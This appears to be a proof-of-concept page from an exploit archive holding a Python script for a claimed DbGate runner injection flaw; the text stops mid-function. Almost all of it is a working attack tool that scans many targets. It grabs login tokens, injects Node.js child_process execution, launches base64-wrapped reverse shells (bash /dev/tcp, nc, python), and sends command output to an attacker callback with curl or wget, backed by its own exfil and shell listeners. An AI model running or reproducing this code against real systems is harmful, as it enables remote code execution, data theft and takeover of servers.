5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-47668.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# By: Nxploited
#
# DbGate JSON runner assessment tool (POST /runners/start injection checks)
# Patched in DbGate v7.1.9+. For authorized security testing only.

from __future__ import annotations

import argparse
import asyncio
import base64
import json
import os
import re
import socket
import sys
import threading
import time
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, quote, urljoin, urlparse, urlunparse

import aiohttp
from colorama import Fore, Style, init as color_init

color_init(autoreset=True)

OUT_DIR = "Nx"
OUT_VULN = ""
OUT_DISPATCH = ""
OUT_REVSH = ""
OUT_EXFIL = ""
OUT_FAIL = ""
OUT_LIST_REPORT = ""
OUT_SUMMARY = ""
SESSION_DIR = ""
SESSION_ID = ""

DEFAULT_TARGETS = "list.txt"
APP_NAME = "dbgate"
DEFAULT_PORT = 3000          # DbGate default HTTP port
DEFAULT_CONCURRENCY = 30
DEFAULT_TIMEOUT = 15.0
DEFAULT_CALLBACK_PORT = 8888
DEFAULT_REVSH_PORT = 4444


# ── logging ──────────────────────────────────────────────────────────────────

def log_ok(msg: str) -> None:
    """Print *msg* to stdout as a green ``[+]`` success line."""
    text = f"{Fore.GREEN}[+] {msg}{Style.RESET_ALL}"
    print(text)


def log_info(msg: str) -> None:
    """Print *msg* to stdout as a cyan ``[*]`` informational line."""
    text = f"{Fore.CYAN}[*] {msg}{Style.RESET_ALL}"
    print(text)


def log_warn(msg: str) -> None:
    """Print *msg* to stdout as a yellow ``[!]`` warning line."""
    text = f"{Fore.YELLOW}[!] {msg}{Style.RESET_ALL}"
    print(text)


def log_fail(msg: str) -> None:
    """Print *msg* to stdout as a red ``[-]`` failure line."""
    text = f"{Fore.RED}[-] {msg}{Style.RESET_ALL}"
    print(text)


def log_pwn(msg: str) -> None:
    """Print *msg* to stdout as a magenta ``[★]`` highlighted line."""
    text = f"{Fore.MAGENTA}[★] {msg}{Style.RESET_ALL}"
    print(text)


_SAVE_WARNED: Set[str] = set()


def save_line(path: str, line: str) -> None:
    """Append one line of text to the file at *path*.

    Trailing whitespace is stripped from *line* and a single newline is
    written after it. The parent directory is created when missing. An empty
    *path* is a no-op.

    Write failures (``OSError``) never propagate: a warning is logged the
    first time a given path fails and later failures for that path are silent.
    """
    if not path:
        return
    try:
        folder = os.path.dirname(path)
        if folder:
            os.makedirs(folder, exist_ok=True)
        with open(path, "a", encoding="utf-8") as out:
            out.write(f"{line.rstrip()}\n")
            out.flush()
    except OSError as exc:
        # Warn once per path so a broken destination does not flood the log.
        if path in _SAVE_WARNED:
            return
        _SAVE_WARNED.add(path)
        log_warn(f"Cannot write to {path}: {exc}")


def init_nx_output() -> str:
    """Create Nx/ output tree; call before any scan."""
    global OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL, OUT_LIST_REPORT, OUT_SUMMARY
    global SESSION_DIR, SESSION_ID

    os.makedirs(OUT_DIR, exist_ok=True)
    os.makedirs(os.path.join(OUT_DIR, "exfil"), exist_ok=True)
    SESSION_ID = time.strftime("%Y%m%d_%H%M%S")
    SESSION_DIR = os.path.join(OUT_DIR, "sessions", SESSION_ID)
    os.makedirs(SESSION_DIR, exist_ok=True)

    OUT_VULN = os.path.join(OUT_DIR, "vuln.txt")
    OUT_DISPATCH = os.path.join(OUT_DIR, "dispatch.txt")
    OUT_REVSH = os.path.join(OUT_DIR, "revsh.txt")
    OUT_EXFIL = os.path.join(OUT_DIR, "exfil.txt")
    OUT_FAIL = os.path.join(OUT_DIR, "failed.txt")
    OUT_LIST_REPORT = os.path.join(OUT_DIR, "list_report.txt")
    OUT_SUMMARY = os.path.join(SESSION_DIR, "summary.json")

    for p in (OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL):
        open(p, "a", encoding="utf-8").close()

    log_ok(f"Output folder: {os.path.abspath(OUT_DIR)}/")
    log_info(f"Session: {SESSION_ID}")
    return SESSION_DIR


def exfil_target_key(target_url: str) -> str:
    """Canonical key for per-target exfil matching (mass-safe)."""
    if not target_url or target_url == "unknown":
        return "unknown"
    return ensure_target_url(target_url).rstrip("/")


def nx_exfil_path(target_url: str) -> str:
    tag = re.sub(r"[^\w.\-]+", "_", urlparse(target_url).netloc or "target")
    return os.path.join(OUT_DIR, "exfil", f"{tag}.txt")


def save_exfil_for_target(target_url: str, peer: str, decoded: str) -> None:
    line = f"[{time.strftime('%Y-%m-%d %H:%M:%S')}] peer={peer}\n{decoded}\n{'─' * 40}"
    save_line(OUT_EXFIL, f"[{target_url}] {decoded[:500]}")
    save_line(nx_exfil_path(target_url), line)


def url_tag(url: str) -> str:
    """Return the network-location part of *url*, or *url* itself if it has none."""
    netloc = urlparse(url).netloc
    return netloc if netloc else url


# ── URL / targets ────────────────────────────────────────────────────────────

def normalize_base(url: str) -> str:
    """Return *url* trimmed, with a scheme, and without trailing slashes.

    Surrounding whitespace is removed first; a blank result yields ``""``.
    When the text does not start with ``http://`` or ``https://``
    (case-insensitive), ``http://`` is prepended. All trailing ``/``
    characters are then stripped.
    """
    cleaned = url.strip()
    if cleaned == "":
        return ""
    has_scheme = re.match(r"^https?://", cleaned, re.I) is not None
    if not has_scheme:
        cleaned = "http://" + cleaned
    return cleaned.rstrip("/")


def ensure_target_url(raw: str, default_port: int = DEFAULT_PORT) -> str:
    """
    Build a valid base URL: scheme://host:port/path
    Never appends port after path (fixes http://host/path:3000 bug).
    """
    raw = normalize_base(raw)
    if not raw:
        return ""
    p = urlparse(raw)
    scheme = (p.scheme or "http").lower()
    host = p.hostname
    if not host:
        return ""
    if p.port is not None:
        port = p.port
    else:
        # DbGate default when line has no explicit port (http or https)
        port = default_port
    path = p.path or ""
    if path == "/":
        path = ""
    netloc = f"{host}:{port}"
    return urlunparse((scheme, netloc, path, "", p.query, p.fragment))


def load_targets_raw(path: str) -> List[str]:
    out: List[str] = []
    try:
        with open(path, "r", encoding="utf-8") as fh:
            for line in fh:
                out.append(line.rstrip("\n\r"))
    except OSError as exc:
        log_fail(f"Cannot read targets: {exc}")
    return out


@dataclass
class ListLoadStats:
    """Counters describing how the lines of a list file were classified."""

    raw: int = 0       # total number of lines read from the file
    blank: int = 0     # lines that were empty or whitespace-only
    comment: int = 0   # lines starting with "#"
    invalid: int = 0   # lines that could not be turned into a URL
    dup: int = 0       # lines whose resolved URL had already been seen
    resolved: int = 0  # lines that produced a new, unique URL


def parse_target_line(
    line: str,
    default_port: int = DEFAULT_PORT,
) -> Tuple[Optional[str], str, str]:
    """
    Returns (url, per_target_command, reason).
    Supports: host, host:port, URL, host/path, and optional |command per line.
    """
    original = line
    per_cmd = ""
    work = line.strip()
    if not work:
        return None, "", "blank"
    if work.startswith("#"):
        return None, "", "comment"

    if "|" in work:
        host_part, _, cmd_part = work.partition("|")
        work = host_part.strip()
        per_cmd = cmd_part.strip()

    line = work
    if not re.match(r"^https?://", line, re.I):
        if re.match(r"^[\d.a-zA-Z_-]+:\d+", line) and "/" not in line.split(":")[0]:
            line = f"http://{line}"
        elif re.match(r"^[\d.a-zA-Z_.-]+(:\d+)?/", line):
            if not line.startswith("http"):
                line = f"http://{line}"
        elif re.match(r"^[\w.\-]+$", line) or re.match(r"^\d{1,3}(\.\d{1,3}){3}$", line):
            line = f"http://{line}"
        else:
            line = f"http://{line}"

    url = ensure_target_url(line, default_port)
    if not url or not urlparse(url).hostname:
        return None, per_cmd, f"invalid:{original[:80]}"
    return url, per_cmd, ""


def load_targets_smart(
    path: str,
    default_port: int = DEFAULT_PORT,
) -> Tuple[List[str], Dict[str, str], ListLoadStats, List[str]]:
    """Load list file with stats; never mixes ports incorrectly."""
    lines = load_targets_raw(path)
    stats = ListLoadStats(raw=len(lines))
    seen: Set[str] = set()
    urls: List[str] = []
    per_cmds: Dict[str, str] = {}
    errors: List[str] = []

    for line in lines:
        if not line.strip():
            stats.blank += 1
            continue
        if line.strip().startswith("#"):
            stats.comment += 1
            continue
        url, per_cmd, reason = parse_target_line(line, default_port)
        if reason == "blank":
            stats.blank += 1
            continue
        if reason == "comment":
            stats.comment += 1
            continue
        if not url:
            stats.invalid += 1
            errors.append(f"{line.strip()} -> {reason}")
            continue
        if url in seen:
            stats.dup += 1
            continue
        seen.add(url)
        urls.append(url)
        if per_cmd:
            per_cmds[url] = per_cmd
        stats.resolved += 1

    return urls, per_cmds, stats, errors


def write_list_report(
    path: str,
    stats: ListLoadStats,
    urls: List[str],
    errors: List[str],
    default_port: int = DEFAULT_PORT,
    per_cmds: Optional[Dict[str, str]] = None,
) -> None:
    lines = [
        f"file={path}",
        f"raw={stats.raw} blank={stats.blank} comment={stats.comment}",
        f"invalid={stats.invalid} dup={stats.dup} resolved={stats.resolved}",
        f"default_port={default_port} (applied when line has no explicit port)",
        "",
        "=== resolved targets ===",
    ]
    for u in urls:
        cmd = (per_cmds or {}).get(u, "")
        lines.append(f"{u}|{cmd}" if cmd else u)
    if errors:
        lines.extend(["", "=== invalid lines ==="])
        lines.extend(errors)
    try:
        with open(OUT_LIST_REPORT, "w", encoding="utf-8") as fh:
            fh.write("\n".join(lines) + "\n")
    except OSError as exc:
        log_warn(f"Cannot write list report: {exc}")


def parse_login_json(raw: Optional[str]) -> Tuple[Optional[Dict[str, Any]], Optional[str]]:
    if not raw or not raw.strip():
        return {"amoid": "none"}, None
    try:
        data = json.loads(raw)
        if not isinstance(data, dict):
            return None, "login JSON must be an object"
        return data, None
    except json.JSONDecodeError as exc:
        return None, f"invalid login JSON: {exc}"


def guess_lan_ip() -> str:
    """Return the local IPv4 address used for outbound traffic.

    A UDP socket is connected to ``8.8.8.8:80`` and the local address the OS
    bound it to is returned.

    Returns:
        The local IPv4 address as a string, or ``"127.0.0.1"`` when any
        socket operation fails with ``OSError``.
    """
    try:
        # The context manager closes the socket even when connect() or
        # getsockname() raises; the original leaked it on those paths.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
            probe.connect(("8.8.8.8", 80))
            return probe.getsockname()[0]
    except OSError:
        return "127.0.0.1"


def extract_bearer_token(data: Any, raw_text: str = "") -> Optional[str]:
    """Pull Bearer token from DbGate /auth/login JSON (several response shapes)."""
    if isinstance(data, dict):
        for key in ("accessToken", "token", "access_token", "jwt", "bearer"):
            val = data.get(key)
            if val and isinstance(val, str):
                return val
        for nest in ("data", "result", "user", "session", "auth"):
            sub = data.get(nest)
            if isinstance(sub, dict):
                found = extract_bearer_token(sub)
                if found:
                    return found
    if raw_text:
        for pattern in (
            r'"accessToken"\s*:\s*"([^"]+)"',
            r'"token"\s*:\s*"([^"]+)"',
            r'"access_token"\s*:\s*"([^"]+)"',
        ):
            m = re.search(pattern, raw_text)
            if m:
                return m.group(1)
    return None


class ReuseHTTPServer(HTTPServer):
    allow_reuse_address = True


# ── injection builders ─────────────────────────────────────────────────────────

def _js_escape_single(s: str) -> str:
    return (
        s.replace("\\", "\\\\")
        .replace("'", "\\'")
        .replace("\n", "\\n")
        .replace("\r", "\\r")
    )


def parse_revsh_endpoint(
    spec: Optional[str],
    default_port: int = DEFAULT_REVSH_PORT,
) -> Tuple[str, int]:
    """
    Parse LHOST:LPORT for reverse shell (address the *target* must dial).
    spec None / AUTO → guessed LAN IP + default_port.
    """
    if spec is None or str(spec).strip().upper() == "AUTO" or not str(spec).strip():
        return guess_lan_ip(), default_port
    raw = str(spec).strip()
    if raw.startswith("[") and "]" in raw:
        host = raw[1 : raw.index("]")]
        rest = raw[raw.index("]") + 1 :]
        if rest.startswith(":"):
            return host, int(rest[1:])
        return host, default_port
    if ":" in raw:
        host, _, port_s = raw.rpartition(":")
        host = host.strip()
        if not host:
            raise ValueError(f"invalid reverse-shell endpoint: {spec!r}")
        return host, int(port_s)
    return raw, default_port


def build_reverse_shell_cmd(lhost: str, lport: int) -> str:
    """
    Detached reverse-shell attempts (async exec). Uses base64-wrapped script
    to avoid broken nested quoting inside sh -c.
    """
    h, p = lhost, int(lport)
    script = (
        f"bash -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || "
        f"sh -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || "
        f"rm -f /tmp/.nx;mkfifo /tmp/.nx;cat /tmp/.nx|sh -i 2>&1|nc {h} {p} >/tmp/.nx || "
        f"nc -e /bin/sh {h} {p} 2>/dev/null || "
        f"busybox nc {h} {p} -e sh 2>/dev/null || "
        f"python3 -c \"import socket,os,subprocess;"
        f"s=socket.socket();s.connect(('{h}',{p}));"
        f"os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        f"subprocess.call(['/bin/sh','-i'])\" 2>/dev/null"
    )
    payload_b64 = base64.b64encode(script.encode()).decode()
    return (
        f"(command -v base64 >/dev/null 2>&1 && "
        f"echo {payload_b64}|base64 -d|nohup sh >/dev/null 2>&1 &) || "
        f"(echo {payload_b64}|openssl base64 -d|nohup sh >/dev/null 2>&1 &)"
    )


def build_node_exec_js(shell_cmd: str, sync: bool = True) -> str:
    esc = _js_escape_single(shell_cmd)
    if sync:
        return (
            f"process.mainModule.require('child_process').execSync('{esc}',"
            f"{{encoding:'utf8',timeout:120000}})"
        )
    return f"process.mainModule.require('child_process').exec('{esc}')"


def build_shell_exfil(
    cmd: str,
    callback_url: str,
    b64: bool = True,
    target_tag: str = "",
) -> str:
    base = callback_url.rstrip("/")
    qs_parts: List[str] = []
    if target_tag:
        qs_parts.append(f"target={quote(target_tag, safe='')}")
    cb_full = f"{base}?{'&'.join(qs_parts)}" if qs_parts else base
    # Run command once, encode once, then try curl then wget (no double exec).
    if b64:
        return (
            f"__nx=$( ({cmd}) 2>&1 ); "
            f"b64=$(printf %s \"$__nx\" | base64 -w0 2>/dev/null "
            f"|| printf %s \"$__nx\" | base64 2>/dev/null || echo FAIL); "
            f"curl -sk -G '{cb_full}' --data-urlencode \"data=$b64\" "
            f"|| wget -qO- --post-data=\"data=$b64\" '{cb_full}'"
        )
    return (
        f"__nx=$( ({cmd}) 2>&1 ); "
        f"curl -sk -G '{cb_full}' --data-urlencode \"data=$__nx\" "
        f"|| wget -qO- --post-data=\"data=$__nx\" '{cb_full}'"
    )


def inject_function_name(node_js: str) -> str:
    return f"x;{node_js};//"


def inject_variable_name(node_js: str, fn_safe: str = "x") -> Tuple[str, str]:
    return f"x;{node_js};var __nx", f"{fn_safe};//"


def build_json_script(
    vector: str,
    node_js: str,
    props: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
    props = props or {}
    if vector == "functionName":
        return {
            "type": "json",
            "commands": [{
                "type": "assign",
                "variableName": "x",
                "functionName": inject_function_name(node_js),
                "props": props,
            }],
            "packageNames": [],
        }
    if vector == "variableName":
        var_name, fn_name = inject_variable_name(node_js)
        return {
            "type": "json",
            "commands": [{
                "type": "assign",
                "variableName": var_name,
                "functionName": fn_name,
                "props": props,
            }],
            "packageNames": [],
        }
    raise ValueError(f"Unknown vector: {vector}")


# ── exfil listener ───────────────────────────────────────────────────────────

class ExfilHandler(BaseHTTPRequestHandler):
    hits: List[str] = []
    hits_by_target: Dict[str, List[str]] = {}
    _lock = threading.Lock()

    @classmethod
    def hit_count(cls) -> int:
        with cls._lock:
            return len(cls.hits)

    @classmethod
    def hits_for_target(cls, target_url: str, baseline: int = 0) -> int:
        key = exfil_target_key(target_url)
        with cls._lock:
            entries = cls.hits_by_target.get(key, [])
            return max(0, len(entries) - baseline)

    def log_message(self, fmt: str, *args: Any) -> None:
        pass

    def _parse_request(self) -> Tuple[str, str, str]:
        peer = self.client_address[0]
        parsed = urlparse(self.path)
        qs = parse_qs(parsed.query)
        target_key = qs.get("target", [""])[0]
        if self.command == "POST":
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length).decode("utf-8", errors="replace")
            bqs = parse_qs(body)
            raw = bqs.get("data", [body])[0]
            if not target_key:
                target_key = bqs.get("target", [""])[0]
            return raw, target_key, peer
        raw = qs.get("data", [""])[0]
        return raw, target_key, peer

    def do_GET(self) -> None:
        self._handle()

    def do_POST(self) -> None:
        self._handle()

    def _handle(self) -> None:
        raw, target_key, peer = self._parse_request()
        decoded = raw
        try:
            decoded = base64.b64decode(raw).decode("utf-8", errors="replace")
        except Exception:
            pass
        target_url = target_key or "unknown"
        line = (
            f"[{time.strftime('%H:%M:%S')}] peer={peer} "
            f"target={target_url} | {decoded[:8000]}"
        )
        store_key = exfil_target_key(target_url) if target_url != "unknown" else "unknown"
        with ExfilHandler._lock:
            ExfilHandler.hits.append(line)
            ExfilHandler.hits_by_target.setdefault(store_key, []).append(decoded)
        log_pwn(f"EXFIL [{target_url}] from {peer}: {decoded[:200]!r}")
        if target_url and target_url != "unknown":
            save_exfil_for_target(target_url, peer, decoded)
        else:
            save_line(OUT_EXFIL, line)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")


def start_exfil_server(
    bind_host: str,
    port: int,
    max_tries: int = 25,
) -> Tuple[HTTPServer, int]:
    """
  Start HTTP exfil listener. If port is busy (e.g. 4444 = msf), try next ports.
    """
    bind = bind_host if bind_host else "0.0.0.0"
    last_err: Optional[OSError] = None
    for offset in range(max_tries):
        try_port = port + offset
        try:
            srv = ReuseHTTPServer((bind, try_port), ExfilHandler)
            threading.Thread(target=srv.serve_forever, daemon=True).start()
            if try_port != port:
                log_warn(f"Port {port} busy — listener using {try_port} instead")
            log_ok(f"Exfil listener bound on {bind}:{try_port}")
            return srv, try_port
        except OSError as exc:
            last_err = exc
            if getattr(exc, "errno", None) not in (48, 98, 10048):
                raise
            continue
    raise OSError(
        f"Could not bind {bind}:{port}-{port + max_tries - 1}: {last_err}"
    )


class TcpRevshListener:
    """TCP listener to verify reverse-shell connectivity from the target."""

    def __init__(self, bind_host: str = "0.0.0.0", port: int = DEFAULT_REVSH_PORT) -> None:
        self.bind_host = bind_host or "0.0.0.0"
        self.port = port
        self._sock: Optional[socket.socket] = None
        self._conn: Optional[socket.socket] = None
        self.peer: Tuple[str, int] = ("", 0)
        self.banner: bytes = b""

    def start(self, max_tries: int = 25) -> int:
        bind = self.bind_host
        last_err: Optional[OSError] = None
        for offset in range(max_tries):
            try_port = self.port + offset
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                sock.bind((bind, try_port))
                sock.listen(1)
                self._sock = sock
                if offset > 0:
                    log_warn(
                        f"Revsh port {self.port} busy — listening on {try_port} instead"
                    )
                self.port = try_port
                log_ok(f"Reverse-shell listener on {bind}:{try_port}")
                return try_port
            except OSError as exc:
                last_err = exc
                sock.close()
                if getattr(exc, "errno", None) not in (48, 98, 10048):
                    raise
                continue
        raise OSError(
            f"Could not bind revsh {bind}:{self.port}-{self.port + max_tries - 1}: {last_err}"
        )

    def wait(self, timeout: float) -> bool:
        if not self._sock:
            return False
        self._sock.settimeout(timeout)
        try:
            conn, addr = self._sock.accept()
            self._conn = conn
            self.peer = (addr[0], addr[1])
            conn.settimeout(2.0)
            try:
                self.banner = conn.recv(4096)
            except OSError:
                self.banner = b""
            return True
        except socket.timeout:
            return False
        except OSError:
            return False

    def relay_interactive(self) -> None:
        """Best-effort line bridge after connect (use external nc for full TTY)."""
        conn = self._conn
        if not conn:
            return

        def _reader() -> None:
            while True:
                try:
                    data = conn.recv(4096)
                    if not data:
                        break
                    sys.stdout.write(data.decode("utf-8", errors="replace"))
                    sys.stdout.flush()
                except OSError:
                    break

        threading.Thread(target=_reader, daemon=True).start()
        log_info("Interactive relay — type commands; Ctrl+C to exit")
        try:
            while True:
                line = input()
                conn.sendall((line + "\n").encode())
        except (EOFError, KeyboardInterrupt, OSError):
            pass

    def close(self) -> None:
        for s in (self._conn, self._sock):
            if s:
                try:
                    s.close()
                except OSError:
                    pass
        self._conn = None
        self._sock = None


async def wait_revsh_async(listener: TcpRevshListener, timeout: float) -> bool:
    loop = asyncio.get_running_loop()
    return await loop.run_in_executor(None, listener.wait, timeout)


def build_callback_url(
    callback_host: str,
    listen_port: int,
    scheme: str = "http",
) -> str:
    host = callback_host.strip()
    if not host:
        host = guess_lan_ip()
    if host in ("0.0.0.0", "::"):
        log_warn("Callback host cannot be 0.0.0.0 — use an IP reachable FROM the target")
        host = guess_lan_ip()
        log_info(f"Using guessed LAN IP for callback: {host}")
    return f"{scheme}://{host}:{listen_port}/"


# ── DbGate client ──────────────────────────────────────────────────────────────

class DbGateExploit:
    VECTORS = ("functionName", "variableName", "both")

    def __init__(
        self,
        base_url: str,
        timeout: float = DEFAULT_TIMEOUT,
        verify_ssl: bool = False,
        token: Optional[str] = None,
        login_body: Optional[Dict[str, Any]] = None,
    ):
        self.base_url = ensure_target_url(base_url)
        self.timeout = aiohttp.ClientTimeout(total=timeout)
        self.verify_ssl = verify_ssl
        self.token = token
        self.login_body = login_body or {"amoid": "none"}
        self.tag = urlparse(self.base_url).netloc or self.base_url
        self.last_vector_used = ""

    def _headers(self, with_auth: bool = True) -> Dict[str, str]:
        h = {"Content-Type": "application/json", "Accept": "application/json"}
        if with_auth and self.token:
            h["Authorization"] = f"Bearer {self.token}"
        return h

    async def _request(
        self,
        session: aiohttp.ClientSession,
        method: str,
        path: str,
        **kwargs: Any,
    ) -> Tuple[int, str, Any]:
        url = urljoin(self.base_url + "/", path.lstrip("/"))
        try:
            async with session.request(
                method, url, ssl=self.verify_ssl, timeout=self.timeout, **kwargs
            ) as resp:
                text = await resp.text()
                try:
                    data = json.loads(text) if text.strip() else {}
                except json.JSONDecodeError:
                    data = {"_raw": text}
                return resp.status, text, data
        except asyncio.TimeoutError:
            return 0, "timeout", {}
        except aiohttp.ClientError as exc:
            return 0, str(exc), {}

    async def probe_alive(self, session: aiohttp.ClientSession) -> bool:
        for path in ("/", "/api/status", "/status"):
            status, _, _ = await self._request(session, "GET", path)
            if status in (200, 401, 403, 404, 302):
                return True
        return False

    async def obtain_token(self, session: aiohttp.ClientSession) -> bool:
        if self.token:
            return True
        status, text, data = await self._request(
            session,
            "POST",
            "/auth/login",
            json=self.login_body,
            headers={"Content-Type": "application/json"},
        )
        if status != 200:
            log_fail(f"[{self.tag}] auth/login HTTP {status}: {text[:120]}")
            return False
        token = extract_bearer_token(data, text)
        if not token:
            log_fail(
                f"[{self.tag}] no token in login response "
                f"(HTTP {status}): {text[:160]}"
            )
            return False
        self.token = token
        preview = token if len(token) < 24 else f"{token[:20]}...{token[-6:]}"
        log_ok(f"[{self.tag}] Bearer token auto-obtained ({preview})")
        return True

    async def runners_start(
        self,
        session: aiohttp.ClientSession,
        script: Dict[str, Any],
    ) -> Tuple[bool, Optional[str], str]:
        status, text, data = await self._request(
            session,
            "POST",
            "/runners/start",
            json={"script": script},
            headers=self._headers(True),
        )
        if status != 200:
            return False, None, f"HTTP {status}: {text[:200]}"
        if isinstance(data, dict) and data.get("errorMessage"):
            return False, None, str(data["errorMessage"])
        runid = None
        if isinstance(data, dict):
            runid = data.get("runid") or data.get("runId")
        if runid or "runid" in text.lower():
            return True, str(runid or "?"), text
        return False, None, text[:300]

    async def run_injection(
        self,
        session: aiohttp.ClientSession,
        vector: str,
        node_js: str,
        props: Optional[Dict[str, Any]] = None,
    ) -> Tuple[bool, Optional[str], str]:
        if vector == "both":
            ok, rid, err = await self.run_injection(
                session, "functionName", node_js, props
            )
            if ok:
                self.last_vector_used = "functionName"
                return ok, rid, err
            ok, rid, err = await self.run_injection(
                session, "variableName", node_js, props
            )
            if ok:
                self.last_vector_used = "variableName"
            return ok, rid, err

        self.last_vector_used = vector
        script = build_json_script(vector, node_js, props)
        return await self.runners_start(session, script)

    async def check_vulnerable(
        self,
        session: aiohttp.ClientSession,
        vector: str = "functionName",
    ) -> Tuple[bool, str]:
        probe_js = "void 0"
        ok, runid, err = await self.run_injection(session, vector, probe_js)
        if ok:
            v = self.last_vector_used or vector
            return True, f"runner-accepted vector={v} runid={runid}"
        return False, err

    async def execute_command(
        self,
        session: aiohttp.ClientSession,
        command: str,
        callback_url: Optional[str] = None,
        vector: str = "functionName",
        async_exec: bool = False,
        b64_exfil: bool = True,
    ) -> Tuple[bool, str]:
        shell = (
            build_shell_exfil(
                command,
                callback_url,
                b64=b64_exfil,
                target_tag=self.base_url,
            )
            if callback_url
            else command
        )
        node_js = build_node_exec_js(shell, sync=not async_exec)
        ok, runid, err = await self.run_injection(session, vector, node_js)
        if ok:
            v = self.last_vector_used or vector
            return True, f"dispatched vector={v} runid={runid}"
        return False, err

    async def full_chain(
        self,
        command: str,
        callback_url: Optional[str] = None,
        vector: str = "functionName",
        check_only: bool = False,
        async_exec: bool = False,
        b64_exfil: bool = True,
        wait_exfil: float = 8.0,
        target_exfil_baseline: int = 0,
        use_reverse_shell: bool = False,
        wait_revsh: float = 15.0,
        revsh_listener: Optional[TcpRevshListener] = None,
        revsh_interactive: bool = False,
    ) -> str:
        """
        fail     — unreachable / auth fail / not vulnerable
        vuln     — runner accepts injection probe (or exec without callback)
        dispatch — payload accepted; no confirmed output / no revsh connect
        exfil    — callback received new data after dispatch (confirmed output)
        revsh    — TCP reverse connection received on local listener
        """
        connector = aiohttp.TCPConnector(ssl=self.verify_ssl, limit=1)
        async with aiohttp.ClientSession(connector=connector) as session:
            if not await self.probe_alive(session):
                log_fail(f"[{self.tag}] target not reachable")
                return "fail"

            if not await self.obtain_token(session):
                return "fail"

            vuln, detail = await self.check_vulnerable(session, vector)
            if not vuln:
                log_fail(f"[{self.tag}] not vulnerable / blocked: {detail}")
                return "fail"

            log_ok(f"[{self.tag}] VULNERABLE ({detail})")
            save_line(OUT_VULN, f"{self.base_url}|{detail}")

            if check_only:
                return "vuln"

            if not command:
                return "vuln"

            exec_async = async_exec or use_reverse_shell
            exec_cb = None if use_reverse_shell else callback_url

            ok, msg = await self.execute_command(
                session,
                command,
                callback_url=exec_cb,
                vector=vector,
                async_exec=exec_async,
                b64_exfil=b64_exfil,
            )
            if not ok:
                log_fail(f"[{self.tag}] exec failed: {msg}")
                return "vuln"

            log_pwn(f"[{self.tag}] {msg}")
            out_file = OUT_REVSH if use_reverse_shell else OUT_DISPATCH
            save_line(
                out_file,
                f"{self.base_url}|cmd={command!r}|callback={callback_url or ''}|{msg}",
            )

            if use_reverse_shell:
                if not revsh_listener:
                    log_warn(f"[{self.tag}] no revsh listener — cannot verify connection")
                    return "dispatch"
                log_info(
                    f"[{self.tag}] waiting up to {wait_revsh:.0f}s for reverse TCP..."
                )
                if await wait_revsh_async(revsh_listener, wait_revsh):
                    peer = f"{revsh_listener.peer[0]}:{revsh_listener.peer[1]}"
                    log_ok(f"[{self.tag}] reverse TCP connected from {peer}")
                    if revsh_listener.banner:
                        preview = revsh_listener.banner[:200]
                        log_info(f"  banner: {preview!r}")
                    save_line(
                        OUT_REVSH,
                        f"{self.base_url}|peer={peer}|{msg}",
                    )
                    if revsh_interactive:
                        revsh_listener.relay_interactive()
                    return "revsh"
                log_warn(
                    f"[{self.tag}] payload dispatched but no reverse TCP "
                    f"(firewall/Docker/no bash|nc; target must reach listener)"
                )
                return "dispatch"

            if not callback_url:
                log_warn(f"[{self.tag}] no callback — blind dispatch only (not confirmed output)")
                return "vuln"

            got = await wait_for_exfil(
                wait_exfil,
                self.base_url,
                target_exfil_baseline,
            )
            if got:
                log_ok(f"[{self.tag}] output received via callback")
                log_info(f"  → {nx_exfil_path(self.base_url)}")
                return "exfil"

            log_warn(
                f"[{self.tag}] payload dispatched but no callback data "
                f"(check firewall/NAT/curl on target; callback={callback_url})"
            )
            return "dispatch"


# ── scan ───────────────────────────────────────────────────────────────────────

def exfil_received_for_target(target_url: str, target_baseline: int) -> bool:
    """Report whether callback data has been recorded for one specific target.

    Delegates to ``ExfilHandler.hits_for_target`` and treats any positive
    result as "received". The baseline is passed through unchanged;
    presumably it is the hit count captured before dispatch so that older
    hits are not counted (confirm against ``ExfilHandler``).
    """
    fresh_hits = ExfilHandler.hits_for_target(target_url, target_baseline)
    return fresh_hits > 0


async def wait_for_exfil(
    wait_sec: float,
    target_url: str,
    target_baseline: int,
    poll_sec: float = 0.5,
) -> bool:
    """Wait for callback data belonging to a single target.

    Args:
        wait_sec: Maximum time to wait; a value <= 0 performs one check only.
        target_url: Target whose callback hits are inspected.
        target_baseline: Baseline forwarded to ``exfil_received_for_target``.
        poll_sec: Pause between checks (shortened near the deadline).

    Returns:
        True as soon as data is seen, False once the deadline has passed.
    """
    def arrived() -> bool:
        return exfil_received_for_target(target_url, target_baseline)

    if wait_sec <= 0:
        return arrived()

    stop_at = time.monotonic() + wait_sec
    while not arrived():
        left = stop_at - time.monotonic()
        if left <= 0:
            return False
        # Never sleep past the deadline.
        await asyncio.sleep(min(poll_sec, left))
    return True


def describe_result(result: str) -> str:
    """Translate a result code into a human-readable explanation.

    Unknown codes are returned unchanged.
    """
    explanations = {
        "fail": "unreachable / auth failed / not vulnerable",
        "vuln": "runner accepted probe (no command output)",
        "dispatch": "payload accepted — no callback/revsh confirmation",
        "exfil": "callback received — command output confirmed",
        "revsh": "reverse TCP connection received (use --revsh-interactive for basic relay)",
    }
    if result in explanations:
        return explanations[result]
    return result


async def scan_one(
    target: str,
    command: str,
    callback_url: Optional[str],
    vector: str,
    check_only: bool,
    timeout: float,
    verify_ssl: bool,
    token: Optional[str],
    login_body: Optional[Dict[str, Any]],
    async_exec: bool,
    b64_exfil: bool,
    wait_exfil: float,
) -> str:
    """Run the full chain against one target and return its result code.

    The number of callback hits already recorded for this target is captured
    (under ``ExfilHandler._lock``) before the chain starts and passed on as
    the baseline. Any exception raised by the chain is logged and reported
